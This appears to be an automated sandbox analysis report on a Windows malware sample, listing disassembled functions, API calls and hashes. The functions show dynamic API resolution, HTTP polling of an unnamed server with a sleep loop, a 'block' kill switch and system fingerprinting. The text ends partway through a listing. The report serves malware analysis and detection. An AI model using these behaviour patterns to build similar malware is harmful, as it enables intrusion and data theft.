                    • Instruction Fuzzy Hash: B3D05EB890430CDBCB00DFE0D9496DDBB79FB0C321F0016A9D90562340EA3154C1CAA6
                    Function 00489C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 633 489c10-489c1a 634 489c20-48a031 GetProcAddress * 43 633->634 635 48a036-48a0ca LoadLibraryA * 8 633->635 634->635 636 48a0cc-48a141 GetProcAddress * 5 635->636 637 48a146-48a14d 635->637 636->637 638 48a153-48a211 GetProcAddress * 8 637->638 639 48a216-48a21d 637->639 638->639 640 48a298-48a29f 639->640 641 48a21f-48a293 GetProcAddress * 5 639->641 642 48a2a5-48a332 GetProcAddress * 6 640->642 643 48a337-48a33e 640->643 641->640 642->643 644 48a41f-48a426 643->644 645 48a344-48a41a GetProcAddress * 9 643->645 646 48a428-48a49d GetProcAddress * 5 644->646 647 48a4a2-48a4a9 644->647 645->644 646->647 648 48a4ab-48a4d7 GetProcAddress * 2 647->648 649 48a4dc-48a4e3 647->649 648->649 650 48a515-48a51c 649->650 651 48a4e5-48a510 GetProcAddress * 2 649->651 652 48a612-48a619 650->652 653 48a522-48a60d GetProcAddress * 10 650->653 651->650 654 48a61b-48a678 GetProcAddress * 4 652->654 655 48a67d-48a684 652->655 653->652 654->655 656 48a69e-48a6a5 655->656 657 48a686-48a699 GetProcAddress 655->657 658 48a708-48a709 656->658 659 48a6a7-48a703 GetProcAddress * 4 656->659 657->656 659->658
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,01225290), ref: 00489C2D
                    • GetProcAddress.KERNEL32(74DD0000,01225230), ref: 00489C45
                    • GetProcAddress.KERNEL32(74DD0000,012392F8), ref: 00489C5E
                    • GetProcAddress.KERNEL32(74DD0000,01239358), ref: 00489C76
                    • GetProcAddress.KERNEL32(74DD0000,01239418), ref: 00489C8E
                    • GetProcAddress.KERNEL32(74DD0000,01239400), ref: 00489CA7
                    • GetProcAddress.KERNEL32(74DD0000,0122BE58), ref: 00489CBF
                    • GetProcAddress.KERNEL32(74DD0000,0123CF10), ref: 00489CD7
                    • GetProcAddress.KERNEL32(74DD0000,0123CF58), ref: 00489CF0
                    • GetProcAddress.KERNEL32(74DD0000,0123D030), ref: 00489D08
                    • GetProcAddress.KERNEL32(74DD0000,0123D0A8), ref: 00489D20
                    • GetProcAddress.KERNEL32(74DD0000,01225250), ref: 00489D39
                    • GetProcAddress.KERNEL32(74DD0000,012252D0), ref: 00489D51
                    • GetProcAddress.KERNEL32(74DD0000,012253D0), ref: 00489D69
                    • GetProcAddress.KERNEL32(74DD0000,01225490), ref: 00489D82
                    • GetProcAddress.KERNEL32(74DD0000,0123CDF0), ref: 00489D9A
                    • GetProcAddress.KERNEL32(74DD0000,0123CF40), ref: 00489DB2
                    • GetProcAddress.KERNEL32(74DD0000,0122BC50), ref: 00489DCB
                    • GetProcAddress.KERNEL32(74DD0000,01225590), ref: 00489DE3
                    • GetProcAddress.KERNEL32(74DD0000,0123D018), ref: 00489DFB
                    • GetProcAddress.KERNEL32(74DD0000,0123CF88), ref: 00489E14
                    • GetProcAddress.KERNEL32(74DD0000,0123CE08), ref: 00489E2C
                    • GetProcAddress.KERNEL32(74DD0000,0123D048), ref: 00489E44
                    • GetProcAddress.KERNEL32(74DD0000,01225550), ref: 00489E5D
                    • GetProcAddress.KERNEL32(74DD0000,0123D060), ref: 00489E75
                    • GetProcAddress.KERNEL32(74DD0000,0123CFA0), ref: 00489E8D
                    • GetProcAddress.KERNEL32(74DD0000,0123CEE0), ref: 00489EA6
                    • GetProcAddress.KERNEL32(74DD0000,0123CFB8), ref: 00489EBE
                    • GetProcAddress.KERNEL32(74DD0000,0123CE98), ref: 00489ED6
                    • GetProcAddress.KERNEL32(74DD0000,0123D0C0), ref: 00489EEF
                    • GetProcAddress.KERNEL32(74DD0000,0123CFD0), ref: 00489F07
                    • GetProcAddress.KERNEL32(74DD0000,0123CFE8), ref: 00489F1F
                    • GetProcAddress.KERNEL32(74DD0000,0123CF70), ref: 00489F38
                    • GetProcAddress.KERNEL32(74DD0000,0123A220), ref: 00489F50
                    • GetProcAddress.KERNEL32(74DD0000,0123CEF8), ref: 00489F68
                    • GetProcAddress.KERNEL32(74DD0000,0123CF28), ref: 00489F81
                    • GetProcAddress.KERNEL32(74DD0000,012255F0), ref: 00489F99
                    • GetProcAddress.KERNEL32(74DD0000,0123D000), ref: 00489FB1
                    • GetProcAddress.KERNEL32(74DD0000,012252F0), ref: 00489FCA
                    • GetProcAddress.KERNEL32(74DD0000,0123D078), ref: 00489FE2
                    • GetProcAddress.KERNEL32(74DD0000,0123CDD8), ref: 00489FFA
                    • GetProcAddress.KERNEL32(74DD0000,01225310), ref: 0048A013
                    • GetProcAddress.KERNEL32(74DD0000,012257B0), ref: 0048A02B
                    • LoadLibraryA.KERNEL32(0123CE20,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A03D
                    • LoadLibraryA.KERNEL32(0123D090,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A04E
                    • LoadLibraryA.KERNEL32(0123CE38,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A060
                    • LoadLibraryA.KERNEL32(0123CE50,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A072
                    • LoadLibraryA.KERNEL32(0123CE68,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A083
                    • LoadLibraryA.KERNEL32(0123CE80,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A095
                    • LoadLibraryA.KERNEL32(0123CEB0,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A0A7
                    • LoadLibraryA.KERNEL32(0123CEC8,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A0B8
                    • GetProcAddress.KERNEL32(75290000,01225850), ref: 0048A0DA
                    • GetProcAddress.KERNEL32(75290000,0123D270), ref: 0048A0F2
                    • GetProcAddress.KERNEL32(75290000,012391A0), ref: 0048A10A
                    • GetProcAddress.KERNEL32(75290000,0123D2D0), ref: 0048A123
                    • GetProcAddress.KERNEL32(75290000,01225690), ref: 0048A13B
                    • GetProcAddress.KERNEL32(73440000,0122BC28), ref: 0048A160
                    • GetProcAddress.KERNEL32(73440000,01225890), ref: 0048A179
                    • GetProcAddress.KERNEL32(73440000,0122BB60), ref: 0048A191
                    • GetProcAddress.KERNEL32(73440000,0123D180), ref: 0048A1A9
                    • GetProcAddress.KERNEL32(73440000,0123D300), ref: 0048A1C2
                    • GetProcAddress.KERNEL32(73440000,01225910), ref: 0048A1DA
                    • GetProcAddress.KERNEL32(73440000,012258B0), ref: 0048A1F2
                    • GetProcAddress.KERNEL32(73440000,0123D198), ref: 0048A20B
                    • GetProcAddress.KERNEL32(752C0000,012256B0), ref: 0048A22C
                    • GetProcAddress.KERNEL32(752C0000,01225950), ref: 0048A244
                    • GetProcAddress.KERNEL32(752C0000,0123D1B0), ref: 0048A25D
                    • GetProcAddress.KERNEL32(752C0000,0123D1C8), ref: 0048A275
                    • GetProcAddress.KERNEL32(752C0000,01225990), ref: 0048A28D
                    • GetProcAddress.KERNEL32(74EC0000,0122B750), ref: 0048A2B3
                    • GetProcAddress.KERNEL32(74EC0000,0122B9F8), ref: 0048A2CB
                    • GetProcAddress.KERNEL32(74EC0000,0123D2B8), ref: 0048A2E3
                    • GetProcAddress.KERNEL32(74EC0000,01225630), ref: 0048A2FC
                    • GetProcAddress.KERNEL32(74EC0000,012258D0), ref: 0048A314
                    • GetProcAddress.KERNEL32(74EC0000,0122BA48), ref: 0048A32C
                    • GetProcAddress.KERNEL32(75BD0000,0123D150), ref: 0048A352
                    • GetProcAddress.KERNEL32(75BD0000,012256D0), ref: 0048A36A
                    • GetProcAddress.KERNEL32(75BD0000,01239110), ref: 0048A382
                    • GetProcAddress.KERNEL32(75BD0000,0123D138), ref: 0048A39B
                    • GetProcAddress.KERNEL32(75BD0000,0123D2A0), ref: 0048A3B3
                    • GetProcAddress.KERNEL32(75BD0000,01225870), ref: 0048A3CB
                    • GetProcAddress.KERNEL32(75BD0000,012256F0), ref: 0048A3E4
                    • GetProcAddress.KERNEL32(75BD0000,0123D1E0), ref: 0048A3FC
                    • GetProcAddress.KERNEL32(75BD0000,0123D2E8), ref: 0048A414
                    • GetProcAddress.KERNEL32(75A70000,01225750), ref: 0048A436
                    • GetProcAddress.KERNEL32(75A70000,0123D390), ref: 0048A44E
                    • GetProcAddress.KERNEL32(75A70000,0123D120), ref: 0048A466
                    • GetProcAddress.KERNEL32(75A70000,0123D318), ref: 0048A47F
                    • GetProcAddress.KERNEL32(75A70000,0123D1F8), ref: 0048A497
                    • GetProcAddress.KERNEL32(75450000,012258F0), ref: 0048A4B8
                    • GetProcAddress.KERNEL32(75450000,01225810), ref: 0048A4D1
                    • GetProcAddress.KERNEL32(75DA0000,01225610), ref: 0048A4F2
                    • GetProcAddress.KERNEL32(75DA0000,0123D288), ref: 0048A50A
                    • GetProcAddress.KERNEL32(6F070000,01225930), ref: 0048A530
                    • GetProcAddress.KERNEL32(6F070000,01225670), ref: 0048A548
                    • GetProcAddress.KERNEL32(6F070000,012257F0), ref: 0048A560
                    • GetProcAddress.KERNEL32(6F070000,0123D330), ref: 0048A579
                    • GetProcAddress.KERNEL32(6F070000,01225650), ref: 0048A591
                    • GetProcAddress.KERNEL32(6F070000,01225710), ref: 0048A5A9
                    • GetProcAddress.KERNEL32(6F070000,01225830), ref: 0048A5C2
                    • GetProcAddress.KERNEL32(6F070000,012259B0), ref: 0048A5DA
                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0048A5F1
                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0048A607
                    • GetProcAddress.KERNEL32(75AF0000,0123D258), ref: 0048A629
                    • GetProcAddress.KERNEL32(75AF0000,012390E0), ref: 0048A641
                    • GetProcAddress.KERNEL32(75AF0000,0123D168), ref: 0048A659
                    • GetProcAddress.KERNEL32(75AF0000,0123D348), ref: 0048A672
                    • GetProcAddress.KERNEL32(75D90000,01225970), ref: 0048A693
                    • GetProcAddress.KERNEL32(6CFC0000,0123D360), ref: 0048A6B4
                    • GetProcAddress.KERNEL32(6CFC0000,01225730), ref: 0048A6CD
                    • GetProcAddress.KERNEL32(6CFC0000,0123D210), ref: 0048A6E5
                    • GetProcAddress.KERNEL32(6CFC0000,0123D378), ref: 0048A6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: HttpQueryInfoA$InternetSetOptionA
                    • API String ID: 2238633743-1775429166
                    • Opcode ID: f928891eca37b3c6eba67e7bc3214ffe641fc22927121889b170b26223d3e169
                    • Instruction ID: c41d8b9c2eadc7a7bea7a4c45ce2d121fe360af5d7244156eebf2171d80eb049
                    • Opcode Fuzzy Hash: f928891eca37b3c6eba67e7bc3214ffe641fc22927121889b170b26223d3e169
                    • Instruction Fuzzy Hash: E0622FF9518200AFC354DFE8ED9899637FBF74C301714A72AE609C3664DA3A94C1DB52
                    Function 00476280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1033 476280-47630b call 48a7a0 call 4747b0 call 48a740 InternetOpenA StrCmpCA 1040 476314-476318 1033->1040 1041 47630d 1033->1041 1042 47631e-476342 InternetConnectA 1040->1042 1043 476509-476525 call 48a7a0 call 48a800 * 2 1040->1043 1041->1040 1044 4764ff-476503 InternetCloseHandle 1042->1044 1045 476348-47634c 1042->1045 1061 476528-47652d 1043->1061 1044->1043 1047 47634e-476358 1045->1047 1048 47635a 1045->1048 1051 476364-476392 HttpOpenRequestA 1047->1051 1048->1051 1053 4764f5-4764f9 InternetCloseHandle 1051->1053 1054 476398-47639c 1051->1054 1053->1044 1056 4763c5-476405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 47639e-4763bf InternetSetOptionA 1054->1057 1059 476407-476427 call 48a740 call 48a800 * 2 1056->1059 1060 47642c-47644b call 488940 1056->1060 1057->1056 1059->1061 1067 47644d-476454 1060->1067 1068 4764c9-4764e9 call 48a740 call 48a800 * 2 1060->1068 1071 4764c7-4764ef InternetCloseHandle 1067->1071 1072 476456-476480 InternetReadFile 1067->1072 1068->1061 1071->1053 1076 476482-476489 1072->1076 1077 47648b 1072->1077 1076->1077 1080 47648d-4764c5 call 48a9b0 call 48a8a0 call 48a800 1076->1080 1077->1071 1080->1072
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                      • Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • InternetOpenA.WININET(00490DFE,00000001,00000000,00000000,00000000), ref: 004762E1
                    • StrCmpCA.SHLWAPI(?,0123E858), ref: 00476303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
                    • HttpOpenRequestA.WININET(00000000,GET,?,0123E298,00000000,00000000,00400100,00000000), ref: 00476385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004763FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0047646D
                    • InternetCloseHandle.WININET(00000000), ref: 004764EF
                    • InternetCloseHandle.WININET(00000000), ref: 004764F9
                    • InternetCloseHandle.WININET(00000000), ref: 00476503
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET
                    • API String ID: 3749127164-2509457195
                    • Opcode ID: 06584afc0dc49f348e74a4b62c4e3e745179cae49cdf17aae885416e64e7c80a
                    • Instruction ID: 87f3cc9eafe6b2573de530db317f036a45e015956719af36f1e0df34e13874ff
                    • Opcode Fuzzy Hash: 06584afc0dc49f348e74a4b62c4e3e745179cae49cdf17aae885416e64e7c80a
                    • Instruction Fuzzy Hash: 6A715071A00218ABEF14EFE0DC45BEE7775BB44700F10859AF5096B190DBB86A85CF56
                    Function 00485510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1090 485510-485577 call 485ad0 call 48a820 * 3 call 48a740 * 4 1106 48557c-485583 1090->1106 1107 485585-4855b6 call 48a820 call 48a7a0 call 471590 call 4851f0 1106->1107 1108 4855d7-48564c call 48a740 * 2 call 471590 call 4852c0 call 48a8a0 call 48a800 call 48aad0 StrCmpCA 1106->1108 1124 4855bb-4855d2 call 48a8a0 call 48a800 1107->1124 1134 485693-4856a9 call 48aad0 StrCmpCA 1108->1134 1138 48564e-48568e call 48a7a0 call 471590 call 4851f0 call 48a8a0 call 48a800 1108->1138 1124->1134 1139 4857dc-485844 call 48a8a0 call 48a820 * 2 call 471670 call 48a800 * 4 call 486560 call 471550 1134->1139 1140 4856af-4856b6 1134->1140 1138->1134 1270 485ac3-485ac6 1139->1270 1143 4857da-48585f call 48aad0 StrCmpCA 1140->1143 1144 4856bc-4856c3 1140->1144 1162 485991-4859f9 call 48a8a0 call 48a820 * 2 call 471670 call 48a800 * 4 call 486560 call 471550 1143->1162 1163 485865-48586c 1143->1163 1147 48571e-485793 call 48a740 * 2 call 471590 call 4852c0 call 48a8a0 call 48a800 call 48aad0 StrCmpCA 1144->1147 1148 4856c5-485719 call 48a820 call 48a7a0 call 471590 call 4851f0 call 48a8a0 call 48a800 1144->1148 1147->1143 1249 485795-4857d5 call 48a7a0 call 471590 call 4851f0 call 48a8a0 call 48a800 1147->1249 1148->1143 1162->1270 1170 48598f-485a14 call 48aad0 StrCmpCA 1163->1170 1171 485872-485879 1163->1171 1199 485a28-485a91 call 48a8a0 call 48a820 * 2 call 471670 call 48a800 * 4 call 486560 call 471550 1170->1199 1200 485a16-485a21 Sleep 1170->1200 1178 48587b-4858ce call 48a820 call 48a7a0 call 471590 call 4851f0 call 48a8a0 call 48a800 1171->1178 1179 4858d3-485948 call 48a740 * 2 call 471590 call 4852c0 call 48a8a0 call 48a800 call 48aad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 48594a-48598a call 48a7a0 call 471590 call 4851f0 call 48a8a0 call 48a800 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                    APIs
                      • Part of subcall function 0048A820: lstrlen.KERNEL32(00474F05,?,?,00474F05,00490DDE), ref: 0048A82B
                      • Part of subcall function 0048A820: lstrcpy.KERNEL32(00490DDE,00000000), ref: 0048A885
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004856A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485857
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485228
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 004852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485318
                      • Part of subcall function 004852C0: lstrlen.KERNEL32(00000000), ref: 0048532F
                      • Part of subcall function 004852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00485364
                      • Part of subcall function 004852C0: lstrlen.KERNEL32(00000000), ref: 00485383
                      • Part of subcall function 004852C0: lstrlen.KERNEL32(00000000), ref: 004853AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0048578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485A0C
                    • Sleep.KERNEL32(0000EA60), ref: 00485A1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: 67aa3a3b624dbf14ae515dc4d2b672d086be53ad0efbeff52eb2fd66a249d702
                    • Instruction ID: 88efdae90fb068104a639411df46e0a71004b26558607818a40ace8b38b362b4
                    • Opcode Fuzzy Hash: 67aa3a3b624dbf14ae515dc4d2b672d086be53ad0efbeff52eb2fd66a249d702
                    • Instruction Fuzzy Hash: 06E18571910104AADB18FBB1DC96EED7339AF54304F50892FB40652091EF7C6F59CBAA
                    Function 004817A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1301 4817a0-4817cd call 48aad0 StrCmpCA 1304 4817cf-4817d1 ExitProcess 1301->1304 1305 4817d7-4817f1 call 48aad0 1301->1305 1309 4817f4-4817f8 1305->1309 1310 4817fe-481811 1309->1310 1311 4819c2-4819cd call 48a800 1309->1311 1312 48199e-4819bd 1310->1312 1313 481817-48181a 1310->1313 1312->1309 1315 481849-481858 call 48a820 1313->1315 1316 4818ad-4818be StrCmpCA 1313->1316 1317 4818cf-4818e0 StrCmpCA 1313->1317 1318 48198f-481999 call 48a820 1313->1318 1319 481821-481830 call 48a820 1313->1319 1320 48185d-48186e StrCmpCA 1313->1320 1321 48187f-481890 StrCmpCA 1313->1321 1322 481970-481981 StrCmpCA 1313->1322 1323 4818f1-481902 StrCmpCA 1313->1323 1324 481951-481962 StrCmpCA 1313->1324 1325 481932-481943 StrCmpCA 1313->1325 1326 481913-481924 StrCmpCA 1313->1326 1327 481835-481844 call 48a820 1313->1327 1315->1312 1329 4818ca 1316->1329 1330 4818c0-4818c3 1316->1330 1331 4818ec 1317->1331 1332 4818e2-4818e5 1317->1332 1318->1312 1319->1312 1348 48187a 1320->1348 1349 481870-481873 1320->1349 1350 48189e-4818a1 1321->1350 1351 481892-48189c 1321->1351 1342 48198d 1322->1342 1343 481983-481986 1322->1343 1333 48190e 1323->1333 1334 481904-481907 1323->1334 1339 48196e 1324->1339 1340 481964-481967 1324->1340 1337 48194f 1325->1337 1338 481945-481948 1325->1338 1335 481930 1326->1335 1336 481926-481929 1326->1336 1327->1312 1329->1312 1330->1329 1331->1312 1332->1331 1333->1312 1334->1333 1335->1312 1336->1335 1337->1312 1338->1337 1339->1312 1340->1339 1342->1312 1343->1342 1348->1312 1349->1348 1352 4818a8 1350->1352 1351->1352 1352->1312
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 004817C5
                    • ExitProcess.KERNEL32 ref: 004817D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: 2fc22199fafc8295faec35d365acba4658ad14e8170cb9584163f8eee2184a8c
                    • Instruction ID: df69049100bd9a6e863445d6c97080ca260f61aa25535710b11ff65a0251ca8b
                    • Opcode Fuzzy Hash: 2fc22199fafc8295faec35d365acba4658ad14e8170cb9584163f8eee2184a8c
                    • Instruction Fuzzy Hash: A1519DB4A00209EFDB04EFA4D954BBE37B9BF04304F10595BE406A7360D778E952CB6A
                    Function 00487500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1356 487500-48754a GetWindowsDirectoryA 1357 48754c 1356->1357 1358 487553-4875c7 GetVolumeInformationA call 488d00 * 3 1356->1358 1357->1358 1365 4875d8-4875df 1358->1365 1366 4875fc-487617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 4875e1-4875fa call 488d00 1365->1367 1369 487628-487658 wsprintfA call 48a740 1366->1369 1370 487619-487626 call 48a740 1366->1370 1367->1365 1377 48767e-48768e 1369->1377 1370->1377
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00487542
